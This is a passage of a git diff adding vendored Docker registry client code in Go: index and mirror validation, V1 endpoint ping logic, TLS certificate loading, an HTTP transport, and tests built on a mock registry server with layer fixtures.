+		// assume indexName is of the form `host` without the port and go on.
+		host = indexName
+	}
+
+	addrs, err := lookupIP(host)
+	if err != nil {
+		ip := net.ParseIP(host)
+		if ip != nil {
+			addrs = []net.IP{ip}
+		}
+
+		// if ip == nil, then `host` is neither an IP nor it could be looked up,
+		// either because the index is unreachable, or because the index is behind an HTTP proxy.
+		// So, len(addrs) == 0 and we're not aborting.
+	}
+
+	// Try CIDR notation only if addrs has any elements, i.e. if `host`'s IP could be determined.
+	for _, addr := range addrs {
+		for _, ipnet := range config.InsecureRegistryCIDRs {
+			// check if the addr falls in the subnet
+			if (*net.IPNet)(ipnet).Contains(addr) {
+				return false
+			}
+		}
+	}
+
+	return true
+}
+
+// ValidateMirror validates an HTTP(S) registry mirror
+func ValidateMirror(val string) (string, error) {
+	uri, err := url.Parse(val)
+	if err != nil {
+		return "", fmt.Errorf("%s is not a valid URI", val)
+	}
+
+	if uri.Scheme != "http" && uri.Scheme != "https" {
+		return "", fmt.Errorf("Unsupported scheme %s", uri.Scheme)
+	}
+
+	if uri.Path != "" || uri.RawQuery != "" || uri.Fragment != "" {
+		return "", fmt.Errorf("Unsupported path/query/fragment at end of the URI")
+	}
+
+	return fmt.Sprintf("%s://%s/", uri.Scheme, uri.Host), nil
+}
+
+// ValidateIndexName validates an index name.
+func ValidateIndexName(val string) (string, error) {
+	if val == reference.LegacyDefaultHostname {
+		val = reference.DefaultHostname
+	}
+	if strings.HasPrefix(val, "-") || strings.HasSuffix(val, "-") {
+		return "", fmt.Errorf("Invalid index name (%s). Cannot begin or end with a hyphen.", val)
+	}
+	return val, nil
+}
+
+func validateNoScheme(reposName string) error {
+	if strings.Contains(reposName, "://") {
+		// It cannot contain a scheme!
+		return ErrInvalidRepositoryName
+	}
+	return nil
+}
+
+// newIndexInfo returns IndexInfo configuration from indexName
+func newIndexInfo(config *serviceConfig, indexName string) (*registrytypes.IndexInfo, error) {
+	var err error
+	indexName, err = ValidateIndexName(indexName)
+	if err != nil {
+		return nil, err
+	}
+
+	// Return any configured index info, first.
+	if index, ok := config.IndexConfigs[indexName]; ok {
+		return index, nil
+	}
+
+	// Construct a non-configured index info.
+	index := &registrytypes.IndexInfo{
+		Name:     indexName,
+		Mirrors:  make([]string, 0),
+		Official: false,
+	}
+	index.Secure = isSecureIndex(config, indexName)
+	return index, nil
+}
+
+// GetAuthConfigKey special-cases using the full index address of the official
+// index as the AuthConfig key, and uses the (host)name[:port] for private indexes.
+func GetAuthConfigKey(index *registrytypes.IndexInfo) string {
+	if index.Official {
+		return IndexServer
+	}
+	return index.Name
+}
+
+// newRepositoryInfo validates and breaks down a repository name into a RepositoryInfo
+func newRepositoryInfo(config *serviceConfig, name reference.Named) (*RepositoryInfo, error) {
+	index, err := newIndexInfo(config, name.Hostname())
+	if err != nil {
+		return nil, err
+	}
+	official := !strings.ContainsRune(name.Name(), '/')
+	return &RepositoryInfo{
+		Named:    name,
+		Index:    index,
+		Official: official,
+	}, nil
+}
+
+// ParseRepositoryInfo performs the breakdown of a repository name into a RepositoryInfo, but
+// lacks registry configuration.
+func ParseRepositoryInfo(reposName reference.Named) (*RepositoryInfo, error) {
+	return newRepositoryInfo(emptyServiceConfig, reposName)
+}
+
+// ParseSearchIndexInfo will use repository name to get back an indexInfo.
+func ParseSearchIndexInfo(reposName string) (*registrytypes.IndexInfo, error) {
+	indexName, _ := splitReposSearchTerm(reposName)
+
+	indexInfo, err := newIndexInfo(emptyServiceConfig, indexName)
+	if err != nil {
+		return nil, err
+	}
+	return indexInfo, nil
+}
diff --git a/vendor/github.com/docker/docker/registry/config_test.go b/vendor/github.com/docker/docker/registry/config_test.go
new file mode 100644
index 0000000000..25578a7f2b
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/config_test.go
@@ -0,0 +1,49 @@
+package registry
+
+import (
+	"testing"
+)
+
+func TestValidateMirror(t *testing.T) {
+	valid := []string{
+		"http://mirror-1.com",
+		"https://mirror-1.com",
+		"http://localhost",
+		"https://localhost",
+		"http://localhost:5000",
+		"https://localhost:5000",
+		"http://127.0.0.1",
+		"https://127.0.0.1",
+		"http://127.0.0.1:5000",
+		"https://127.0.0.1:5000",
+	}
+
+	invalid := []string{
+		"!invalid!://%as%",
+		"ftp://mirror-1.com",
+		"http://mirror-1.com/",
+		"http://mirror-1.com/?q=foo",
+		"http://mirror-1.com/v1/",
+		"http://mirror-1.com/v1/?q=foo",
+		"http://mirror-1.com/v1/?q=foo#frag",
+		"http://mirror-1.com?q=foo",
+		"https://mirror-1.com#frag",
+		"https://mirror-1.com/",
+		"https://mirror-1.com/#frag",
+		"https://mirror-1.com/v1/",
+		"https://mirror-1.com/v1/#",
+		"https://mirror-1.com?q",
+	}
+
+	for _, address := range valid {
+		if ret, err := ValidateMirror(address); err != nil || ret == "" {
+			t.Errorf("ValidateMirror(`"+address+"`) got %s %s", ret, err)
+		}
+	}
+
+	for _, address := range invalid {
+		if ret, err := ValidateMirror(address); err == nil || ret != "" {
+			t.Errorf("ValidateMirror(`"+address+"`) got %s %s", ret, err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/registry/config_unix.go b/vendor/github.com/docker/docker/registry/config_unix.go
new file mode 100644
index 0000000000..d692e8ef50
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/config_unix.go
@@ -0,0 +1,25 @@
+// +build !windows
+
+package registry
+
+import (
+	"github.com/spf13/pflag"
+)
+
+var (
+	// CertsDir is the directory where certificates are stored
+	CertsDir = "/etc/docker/certs.d"
+)
+
+// cleanPath is used to ensure that a directory name is valid on the target
+// platform. It will be passed in something *similar* to a URL such as
+// https:/index.docker.io/v1. Not all platforms support directory names
+// which contain those characters (such as : on Windows)
+func cleanPath(s string) string {
+	return s
+}
+
+// installCliPlatformFlags handles any platform specific flags for the service.
+func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) {
+	flags.BoolVar(&options.V2Only, "disable-legacy-registry", false, "Disable contacting legacy registries")
+}
diff --git a/vendor/github.com/docker/docker/registry/config_windows.go b/vendor/github.com/docker/docker/registry/config_windows.go
new file mode 100644
index 0000000000..d1b313dc1e
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/config_windows.go
@@ -0,0 +1,25 @@
+package registry
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/spf13/pflag"
+)
+
+// CertsDir is the directory where certificates are stored
+var CertsDir = os.Getenv("programdata") + `\docker\certs.d`
+
+// cleanPath is used to ensure that a directory name is valid on the target
+// platform. It will be passed in something *similar* to a URL such as
+// https:\index.docker.io\v1. Not all platforms support directory names
+// which contain those characters (such as : on Windows)
+func cleanPath(s string) string {
+	return filepath.FromSlash(strings.Replace(s, ":", "", -1))
+}
+
+// installCliPlatformFlags handles any platform specific flags for the service.
+func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) {
+	// No Windows specific flags.
+}
diff --git a/vendor/github.com/docker/docker/registry/endpoint_test.go b/vendor/github.com/docker/docker/registry/endpoint_test.go
new file mode 100644
index 0000000000..8451d3f678
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/endpoint_test.go
@@ -0,0 +1,78 @@
+package registry
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"testing"
+)
+
+func TestEndpointParse(t *testing.T) {
+	testData := []struct {
+		str      string
+		expected string
+	}{
+		{IndexServer, IndexServer},
+		{"http://0.0.0.0:5000/v1/", "http://0.0.0.0:5000/v1/"},
+		{"http://0.0.0.0:5000", "http://0.0.0.0:5000/v1/"},
+		{"0.0.0.0:5000", "https://0.0.0.0:5000/v1/"},
+		{"http://0.0.0.0:5000/nonversion/", "http://0.0.0.0:5000/nonversion/v1/"},
+		{"http://0.0.0.0:5000/v0/", "http://0.0.0.0:5000/v0/v1/"},
+	}
+	for _, td := range testData {
+		e, err := newV1EndpointFromStr(td.str, nil, "", nil)
+		if err != nil {
+			t.Errorf("%q: %s", td.str, err)
+		}
+		if e == nil {
+			t.Logf("something's fishy, endpoint for %q is nil", td.str)
+			continue
+		}
+		if e.String() != td.expected {
+			t.Errorf("expected %q, got %q", td.expected, e.String())
+		}
+	}
+}
+
+func TestEndpointParseInvalid(t *testing.T) {
+	testData := []string{
+		"http://0.0.0.0:5000/v2/",
+	}
+	for _, td := range testData {
+		e, err := newV1EndpointFromStr(td, nil, "", nil)
+		if err == nil {
+			t.Errorf("expected error parsing %q: parsed as %q", td, e)
+		}
+	}
+}
+
+// Ensure that a registry endpoint that responds with a 401 only is determined
+// to be a valid v1 registry endpoint
+func TestValidateEndpoint(t *testing.T) {
+	requireBasicAuthHandler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Add("WWW-Authenticate", `Basic realm="localhost"`)
+		w.WriteHeader(http.StatusUnauthorized)
+	})
+
+	// Make a test server which should validate as a v1 server.
+	testServer := httptest.NewServer(requireBasicAuthHandler)
+	defer testServer.Close()
+
+	testServerURL, err := url.Parse(testServer.URL)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	testEndpoint := V1Endpoint{
+		URL:    testServerURL,
+		client: HTTPClient(NewTransport(nil)),
+	}
+
+	if err = validateEndpoint(&testEndpoint); err != nil {
+		t.Fatal(err)
+	}
+
+	if testEndpoint.URL.Scheme != "http" {
+		t.Fatalf("expecting to validate endpoint as http, got url %s", testEndpoint.String())
+	}
+}
diff --git a/vendor/github.com/docker/docker/registry/endpoint_v1.go b/vendor/github.com/docker/docker/registry/endpoint_v1.go
new file mode 100644
index 0000000000..6bcf8c935d
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/endpoint_v1.go
@@ -0,0 +1,198 @@
+package registry
+
+import (
+	"crypto/tls"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/client/transport"
+	registrytypes "github.com/docker/docker/api/types/registry"
+)
+
+// V1Endpoint stores basic information about a V1 registry endpoint.
+type V1Endpoint struct {
+	client   *http.Client
+	URL      *url.URL
+	IsSecure bool
+}
+
+// NewV1Endpoint parses the given address to return a registry endpoint.
+func NewV1Endpoint(index *registrytypes.IndexInfo, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) {
+	tlsConfig, err := newTLSConfig(index.Name, index.Secure)
+	if err != nil {
+		return nil, err
+	}
+
+	endpoint, err := newV1EndpointFromStr(GetAuthConfigKey(index), tlsConfig, userAgent, metaHeaders)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := validateEndpoint(endpoint); err != nil {
+		return nil, err
+	}
+
+	return endpoint, nil
+}
+
+func validateEndpoint(endpoint *V1Endpoint) error {
+	logrus.Debugf("pinging registry endpoint %s", endpoint)
+
+	// Try HTTPS ping to registry
+	endpoint.URL.Scheme = "https"
+	if _, err := endpoint.Ping(); err != nil {
+		if endpoint.IsSecure {
+			// If registry is secure and HTTPS failed, show user the error and tell them about `--insecure-registry`
+			// in case that's what they need. DO NOT accept unknown CA certificates, and DO NOT fallback to HTTP.
+			return fmt.Errorf("invalid registry endpoint %s: %v. If this private registry supports only HTTP or HTTPS with an unknown CA certificate, please add `--insecure-registry %s` to the daemon's arguments. In the case of HTTPS, if you have access to the registry's CA certificate, no need for the flag; simply place the CA certificate at /etc/docker/certs.d/%s/ca.crt", endpoint, err, endpoint.URL.Host, endpoint.URL.Host)
+		}
+
+		// If registry is insecure and HTTPS failed, fallback to HTTP.
+		logrus.Debugf("Error from registry %q marked as insecure: %v. Insecurely falling back to HTTP", endpoint, err)
+		endpoint.URL.Scheme = "http"
+
+		var err2 error
+		if _, err2 = endpoint.Ping(); err2 == nil {
+			return nil
+		}
+
+		return fmt.Errorf("invalid registry endpoint %q. HTTPS attempt: %v. HTTP attempt: %v", endpoint, err, err2)
+	}
+
+	return nil
+}
+
+func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) {
+	endpoint := &V1Endpoint{
+		IsSecure: (tlsConfig == nil || !tlsConfig.InsecureSkipVerify),
+		URL:      new(url.URL),
+	}
+
+	*endpoint.URL = address
+
+	// TODO(tiborvass): make sure a ConnectTimeout transport is used
+	tr := NewTransport(tlsConfig)
+	endpoint.client = HTTPClient(transport.NewTransport(tr, DockerHeaders(userAgent, metaHeaders)...))
+	return endpoint, nil
+}
+
+// trimV1Address trims the version off the address and returns the
+// trimmed address or an error if there is a non-V1 version.
+func trimV1Address(address string) (string, error) {
+	var (
+		chunks        []string
+		apiVersionStr string
+	)
+
+	if strings.HasSuffix(address, "/") {
+		address = address[:len(address)-1]
+	}
+
+	chunks = strings.Split(address, "/")
+	apiVersionStr = chunks[len(chunks)-1]
+	if apiVersionStr == "v1" {
+		return strings.Join(chunks[:len(chunks)-1], "/"), nil
+	}
+
+	for k, v := range apiVersions {
+		if k != APIVersion1 && apiVersionStr == v {
+			return "", fmt.Errorf("unsupported V1 version path %s", apiVersionStr)
+		}
+	}
+
+	return address, nil
+}
+
+func newV1EndpointFromStr(address string, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) {
+	if !strings.HasPrefix(address, "http://") && !strings.HasPrefix(address, "https://") {
+		address = "https://" + address
+	}
+
+	address, err := trimV1Address(address)
+	if err != nil {
+		return nil, err
+	}
+
+	uri, err := url.Parse(address)
+	if err != nil {
+		return nil, err
+	}
+
+	endpoint, err := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders)
+	if err != nil {
+		return nil, err
+	}
+
+	return endpoint, nil
+}
+
+// Get the formatted URL for the root of this registry Endpoint
+func (e *V1Endpoint) String() string {
+	return e.URL.String() + "/v1/"
+}
+
+// Path returns a formatted string for the URL
+// of this endpoint with the given path appended.
+func (e *V1Endpoint) Path(path string) string {
+	return e.URL.String() + "/v1/" + path
+}
+
+// Ping returns a PingResult which indicates whether the registry is standalone or not.
+func (e *V1Endpoint) Ping() (PingResult, error) {
+	logrus.Debugf("attempting v1 ping for registry endpoint %s", e)
+
+	if e.String() == IndexServer {
+		// Skip the check, we know this one is valid
+		// (and we never want to fallback to http in case of error)
+		return PingResult{Standalone: false}, nil
+	}
+
+	req, err := http.NewRequest("GET", e.Path("_ping"), nil)
+	if err != nil {
+		return PingResult{Standalone: false}, err
+	}
+
+	resp, err := e.client.Do(req)
+	if err != nil {
+		return PingResult{Standalone: false}, err
+	}
+
+	defer resp.Body.Close()
+
+	jsonString, err := ioutil.ReadAll(resp.Body)
+	if err != nil {
+		return PingResult{Standalone: false}, fmt.Errorf("error while reading the http response: %s", err)
+	}
+
+	// If the header is absent, we assume true for compatibility with earlier
+	// versions of the registry. default to true
+	info := PingResult{
+		Standalone: true,
+	}
+	if err := json.Unmarshal(jsonString, &info); err != nil {
+		logrus.Debugf("Error unmarshalling the _ping PingResult: %s", err)
+		// don't stop here. Just assume sane defaults
+	}
+	if hdr := resp.Header.Get("X-Docker-Registry-Version"); hdr != "" {
+		logrus.Debugf("Registry version header: '%s'", hdr)
+		info.Version = hdr
+	}
+	logrus.Debugf("PingResult.Version: %q", info.Version)
+
+	standalone := resp.Header.Get("X-Docker-Registry-Standalone")
+	logrus.Debugf("Registry standalone header: '%s'", standalone)
+	// Accepted values are "true" (case-insensitive) and "1".
+	if strings.EqualFold(standalone, "true") || standalone == "1" {
+		info.Standalone = true
+	} else if len(standalone) > 0 {
+		// there is a header set, and it is not "true" or "1", so assume fails
+		info.Standalone = false
+	}
+	logrus.Debugf("PingResult.Standalone: %t", info.Standalone)
+	return info, nil
+}
diff --git a/vendor/github.com/docker/docker/registry/registry.go b/vendor/github.com/docker/docker/registry/registry.go
new file mode 100644
index 0000000000..17fa97ce3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/registry.go
@@ -0,0 +1,191 @@
+// Package registry contains client primitives to interact with a remote Docker registry.
+package registry
+
+import (
+	"crypto/tls"
+	"errors"
+	"fmt"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+var (
+	// ErrAlreadyExists is an error returned if an image being pushed
+	// already exists on the remote side
+	ErrAlreadyExists = errors.New("Image already exists")
+)
+
+func newTLSConfig(hostname string, isSecure bool) (*tls.Config, error) {
+	// PreferredServerCipherSuites should have no effect
+	tlsConfig := tlsconfig.ServerDefault()
+
+	tlsConfig.InsecureSkipVerify = !isSecure
+
+	if isSecure && CertsDir != "" {
+		hostDir := filepath.Join(CertsDir, cleanPath(hostname))
+		logrus.Debugf("hostDir: %s", hostDir)
+		if err := ReadCertsDirectory(tlsConfig, hostDir); err != nil {
+			return nil, err
+		}
+	}
+
+	return tlsConfig, nil
+}
+
+func hasFile(files []os.FileInfo, name string) bool {
+	for _, f := range files {
+		if f.Name() == name {
+			return true
+		}
+	}
+	return false
+}
+
+// ReadCertsDirectory reads the directory for TLS certificates
+// including roots and certificate pairs and updates the
+// provided TLS configuration.
+func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error {
+	fs, err := ioutil.ReadDir(directory)
+	if err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	for _, f := range fs {
+		if strings.HasSuffix(f.Name(), ".crt") {
+			if tlsConfig.RootCAs == nil {
+				systemPool, err := tlsconfig.SystemCertPool()
+				if err != nil {
+					return fmt.Errorf("unable to get system cert pool: %v", err)
+				}
+				tlsConfig.RootCAs = systemPool
+			}
+			logrus.Debugf("crt: %s", filepath.Join(directory, f.Name()))
+			data, err := ioutil.ReadFile(filepath.Join(directory, f.Name()))
+			if err != nil {
+				return err
+			}
+			tlsConfig.RootCAs.AppendCertsFromPEM(data)
+		}
+		if strings.HasSuffix(f.Name(), ".cert") {
+			certName := f.Name()
+			keyName := certName[:len(certName)-5] + ".key"
+			logrus.Debugf("cert: %s", filepath.Join(directory, f.Name()))
+			if !hasFile(fs, keyName) {
+				return fmt.Errorf("Missing key %s for client certificate %s. Note that CA certificates should use the extension .crt.", keyName, certName)
+			}
+			cert, err := tls.LoadX509KeyPair(filepath.Join(directory, certName), filepath.Join(directory, keyName))
+			if err != nil {
+				return err
+			}
+			tlsConfig.Certificates = append(tlsConfig.Certificates, cert)
+		}
+		if strings.HasSuffix(f.Name(), ".key") {
+			keyName := f.Name()
+			certName := keyName[:len(keyName)-4] + ".cert"
+			logrus.Debugf("key: %s", filepath.Join(directory, f.Name()))
+			if !hasFile(fs, certName) {
+				return fmt.Errorf("Missing client certificate %s for key %s", certName, keyName)
+			}
+		}
+	}
+
+	return nil
+}
+
+// DockerHeaders returns request modifiers with a User-Agent and metaHeaders
+func DockerHeaders(userAgent string, metaHeaders http.Header) []transport.RequestModifier {
+	modifiers := []transport.RequestModifier{}
+	if userAgent != "" {
+		modifiers = append(modifiers, transport.NewHeaderRequestModifier(http.Header{
+			"User-Agent": []string{userAgent},
+		}))
+	}
+	if metaHeaders != nil {
+		modifiers = append(modifiers, transport.NewHeaderRequestModifier(metaHeaders))
+	}
+	return modifiers
+}
+
+// HTTPClient returns an HTTP client structure which uses the given transport
+// and contains the necessary headers for redirected requests
+func HTTPClient(transport http.RoundTripper) *http.Client {
+	return &http.Client{
+		Transport:     transport,
+		CheckRedirect: addRequiredHeadersToRedirectedRequests,
+	}
+}
+
+func trustedLocation(req *http.Request) bool {
+	var (
+		trusteds = []string{"docker.com", "docker.io"}
+		hostname = strings.SplitN(req.Host, ":", 2)[0]
+	)
+	if req.URL.Scheme != "https" {
+		return false
+	}
+
+	for _, trusted := range trusteds {
+		if hostname == trusted || strings.HasSuffix(hostname, "."+trusted) {
+			return true
+		}
+	}
+	return false
+}
+
+// addRequiredHeadersToRedirectedRequests adds the necessary redirection headers
+// for redirected requests
+func addRequiredHeadersToRedirectedRequests(req *http.Request, via []*http.Request) error {
+	if via != nil && via[0] != nil {
+		if trustedLocation(req) && trustedLocation(via[0]) {
+			req.Header = via[0].Header
+			return nil
+		}
+		for k, v := range via[0].Header {
+			if k != "Authorization" {
+				for _, vv := range v {
+					req.Header.Add(k, vv)
+				}
+			}
+		}
+	}
+	return nil
+}
+
+// NewTransport returns a new HTTP transport. If tlsConfig is nil, it uses the
+// default TLS configuration.
+func NewTransport(tlsConfig *tls.Config) *http.Transport {
+	if tlsConfig == nil {
+		tlsConfig = tlsconfig.ServerDefault()
+	}
+
+	direct := &net.Dialer{
+		Timeout:   30 * time.Second,
+		KeepAlive: 30 * time.Second,
+		DualStack: true,
+	}
+
+	base := &http.Transport{
+		Proxy:               http.ProxyFromEnvironment,
+		Dial:                direct.Dial,
+		TLSHandshakeTimeout: 10 * time.Second,
+		TLSClientConfig:     tlsConfig,
+		// TODO(dmcgowan): Call close idle connections when complete and use keep alive
+		DisableKeepAlives: true,
+	}
+
+	proxyDialer, err := sockets.DialerFromEnvironment(direct)
+	if err == nil {
+		base.Dial = proxyDialer.Dial
+	}
+	return base
+}
diff --git a/vendor/github.com/docker/docker/registry/registry_mock_test.go b/vendor/github.com/docker/docker/registry/registry_mock_test.go
new file mode 100644
index 0000000000..21fc1fdcc7
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/registry_mock_test.go
@@ -0,0 +1,478 @@
+// +build !solaris
+
+package registry
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"strconv"
+	"strings"
+	"testing"
+	"time"
+
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/reference"
+	"github.com/gorilla/mux"
+
+	"github.com/Sirupsen/logrus"
+)
+
+var (
+	testHTTPServer  *httptest.Server
+	testHTTPSServer *httptest.Server
+	testLayers      = map[string]map[string]string{
+		"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20": {
+			"json": `{"id":"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+				"comment":"test base image","created":"2013-03-23T12:53:11.10432-07:00",
+				"container_config":{"Hostname":"","User":"","Memory":0,"MemorySwap":0,
+				"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,
+				"Tty":false,"OpenStdin":false,"StdinOnce":false,
+				"Env":null,"Cmd":null,"Dns":null,"Image":"","Volumes":null,
+				"VolumesFrom":"","Entrypoint":null},"Size":424242}`,
+			"checksum_simple": "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37",
+			"checksum_tarsum": "tarsum+sha256:4409a0685741ca86d38df878ed6f8cbba4c99de5dc73cd71aef04be3bb70be7c",
+			"ancestry":        `["77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20"]`,
+			"layer": string([]byte{
+				0x1f, 0x8b, 0x08, 0x08, 0x0e, 0xb0, 0xee, 0x51, 0x02, 0x03, 0x6c, 0x61, 0x79, 0x65,
+				0x72, 0x2e, 0x74, 0x61, 0x72, 0x00, 0xed, 0xd2, 0x31, 0x0e, 0xc2, 0x30, 0x0c, 0x05,
+				0x50, 0xcf, 0x9c, 0xc2, 0x27, 0x48, 0xed, 0x38, 0x4e, 0xce, 0x13, 0x44, 0x2b, 0x66,
+				0x62, 0x24, 0x8e, 0x4f, 0xa0, 0x15, 0x63, 0xb6, 0x20, 0x21, 0xfc, 0x96, 0xbf, 0x78,
+				0xb0, 0xf5, 0x1d, 0x16, 0x98, 0x8e, 0x88, 0x8a, 0x2a, 0xbe, 0x33, 0xef, 0x49, 0x31,
+				0xed, 0x79, 0x40, 0x8e, 0x5c, 0x44, 0x85, 0x88, 0x33, 0x12, 0x73, 0x2c, 0x02, 0xa8,
+				0xf0, 0x05, 0xf7, 0x66, 0xf5, 0xd6, 0x57, 0x69, 0xd7, 0x7a, 0x19, 0xcd, 0xf5, 0xb1,
+				0x6d, 0x1b, 0x1f, 0xf9, 0xba, 0xe3, 0x93, 0x3f, 0x22, 0x2c, 0xb6, 0x36, 0x0b, 0xf6,
+				0xb0, 0xa9, 0xfd, 0xe7, 0x94, 0x46, 0xfd, 0xeb, 0xd1, 0x7f, 0x2c, 0xc4, 0xd2, 0xfb,
+				0x97, 0xfe, 0x02, 0x80, 0xe4, 0xfd, 0x4f, 0x77, 0xae, 0x6d, 0x3d, 0x81, 0x73, 0xce,
+				0xb9, 0x7f, 0xf3, 0x04, 0x41, 0xc1, 0xab, 0xc6, 0x00, 0x0a, 0x00, 0x00,
+			}),
+		},
+		"42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d": {
+			"json": `{"id":"42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d",
+				"parent":"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+				"comment":"test base image","created":"2013-03-23T12:55:11.10432-07:00",
+				"container_config":{"Hostname":"","User":"","Memory":0,"MemorySwap":0,
+				"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,
+				"Tty":false,"OpenStdin":false,"StdinOnce":false,
+				"Env":null,"Cmd":null,"Dns":null,"Image":"","Volumes":null,
+				"VolumesFrom":"","Entrypoint":null},"Size":424242}`,
+			"checksum_simple": "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2",
+			"checksum_tarsum": "tarsum+sha256:68fdb56fb364f074eec2c9b3f85ca175329c4dcabc4a6a452b7272aa613a07a2",
+			"ancestry": `["42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d",
+				"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20"]`,
+			"layer": string([]byte{
+				0x1f, 0x8b, 0x08, 0x08, 0xbd, 0xb3, 0xee, 0x51, 0x02, 0x03, 0x6c, 0x61, 0x79, 0x65,
+				0x72, 0x2e, 0x74, 0x61, 0x72, 0x00, 0xed, 0xd1, 0x31, 0x0e, 0xc2, 0x30, 0x0c, 0x05,
+				0x50, 0xcf, 0x9c, 0xc2, 0x27, 0x48, 0x9d, 0x38, 0x8e, 0xcf, 0x53, 0x51, 0xaa, 0x56,
+				0xea, 0x44, 0x82, 0xc4, 0xf1, 0x09, 0xb4, 0xea, 0x98, 0x2d, 0x48, 0x08, 0xbf, 0xe5,
+				0x2f, 0x1e, 0xfc, 0xf5, 0xdd, 0x00, 0xdd, 0x11, 0x91, 0x8a, 0xe0, 0x27, 0xd3, 0x9e,
+				0x14, 0xe2, 0x9e, 0x07, 0xf4, 0xc1, 0x2b, 0x0b, 0xfb, 0xa4, 0x82, 0xe4, 0x3d, 0x93,
+				0x02, 0x0a, 0x7c, 0xc1, 0x23, 0x97, 0xf1, 0x5e, 0x5f, 0xc9, 0xcb, 0x38, 0xb5, 0xee,
+				0xea, 0xd9, 0x3c, 0xb7, 0x4b, 0xbe, 0x7b, 0x9c, 0xf9, 0x23, 0xdc, 0x50, 0x6e, 0xb9,
+				0xb8, 0xf2, 0x2c, 0x5d, 0xf7, 0x4f, 0x31, 0xb6, 0xf6, 0x4f, 0xc7, 0xfe, 0x41, 0x55,
+				0x63, 0xdd, 0x9f, 0x89, 0x09, 0x90, 0x6c, 0xff, 0xee, 0xae, 0xcb, 0xba, 0x4d, 0x17,
+				0x30, 0xc6, 0x18, 0xf3, 0x67, 0x5e, 0xc1, 0xed, 0x21, 0x5d, 0x00, 0x0a, 0x00, 0x00,
+			}),
+		},
+	}
+	testRepositories = map[string]map[string]string{
+		"foo42/bar": {
+			"latest": "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d",
+			"test":   "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d",
+		},
+	}
+	mockHosts = map[string][]net.IP{
+		"":            {net.ParseIP("0.0.0.0")},
+		"localhost":   {net.ParseIP("127.0.0.1"), net.ParseIP("::1")},
+		"example.com": {net.ParseIP("42.42.42.42")},
+		"other.com":   {net.ParseIP("43.43.43.43")},
+	}
+)
+
+func init() {
+	r := mux.NewRouter()
+
+	// /v1/
+	r.HandleFunc("/v1/_ping", handlerGetPing).Methods("GET")
+	r.HandleFunc("/v1/images/{image_id:[^/]+}/{action:json|layer|ancestry}", handlerGetImage).Methods("GET")
+	r.HandleFunc("/v1/images/{image_id:[^/]+}/{action:json|layer|checksum}", handlerPutImage).Methods("PUT")
+	r.HandleFunc("/v1/repositories/{repository:.+}/tags", handlerGetDeleteTags).Methods("GET", "DELETE")
+	r.HandleFunc("/v1/repositories/{repository:.+}/tags/{tag:.+}", handlerGetTag).Methods("GET")
+	r.HandleFunc("/v1/repositories/{repository:.+}/tags/{tag:.+}", handlerPutTag).Methods("PUT")
+	r.HandleFunc("/v1/users{null:.*}", handlerUsers).Methods("GET", "POST", "PUT")
+	r.HandleFunc("/v1/repositories/{repository:.+}{action:/images|/}", handlerImages).Methods("GET", "PUT", "DELETE")
+	r.HandleFunc("/v1/repositories/{repository:.+}/auth", handlerAuth).Methods("PUT")
+	r.HandleFunc("/v1/search", handlerSearch).Methods("GET")
+
+	// /v2/
+	r.HandleFunc("/v2/version", handlerGetPing).Methods("GET")
+
+	testHTTPServer = httptest.NewServer(handlerAccessLog(r))
+	testHTTPSServer = httptest.NewTLSServer(handlerAccessLog(r))
+
+	// override net.LookupIP
+	lookupIP = func(host string) ([]net.IP, error) {
+		if host == "127.0.0.1" {
+			// I believe in future Go versions this will fail, so let's fix it later
+			return net.LookupIP(host)
+		}
+		for h, addrs := range mockHosts {
+			if host == h {
+				return addrs, nil
+			}
+			for _, addr := range addrs {
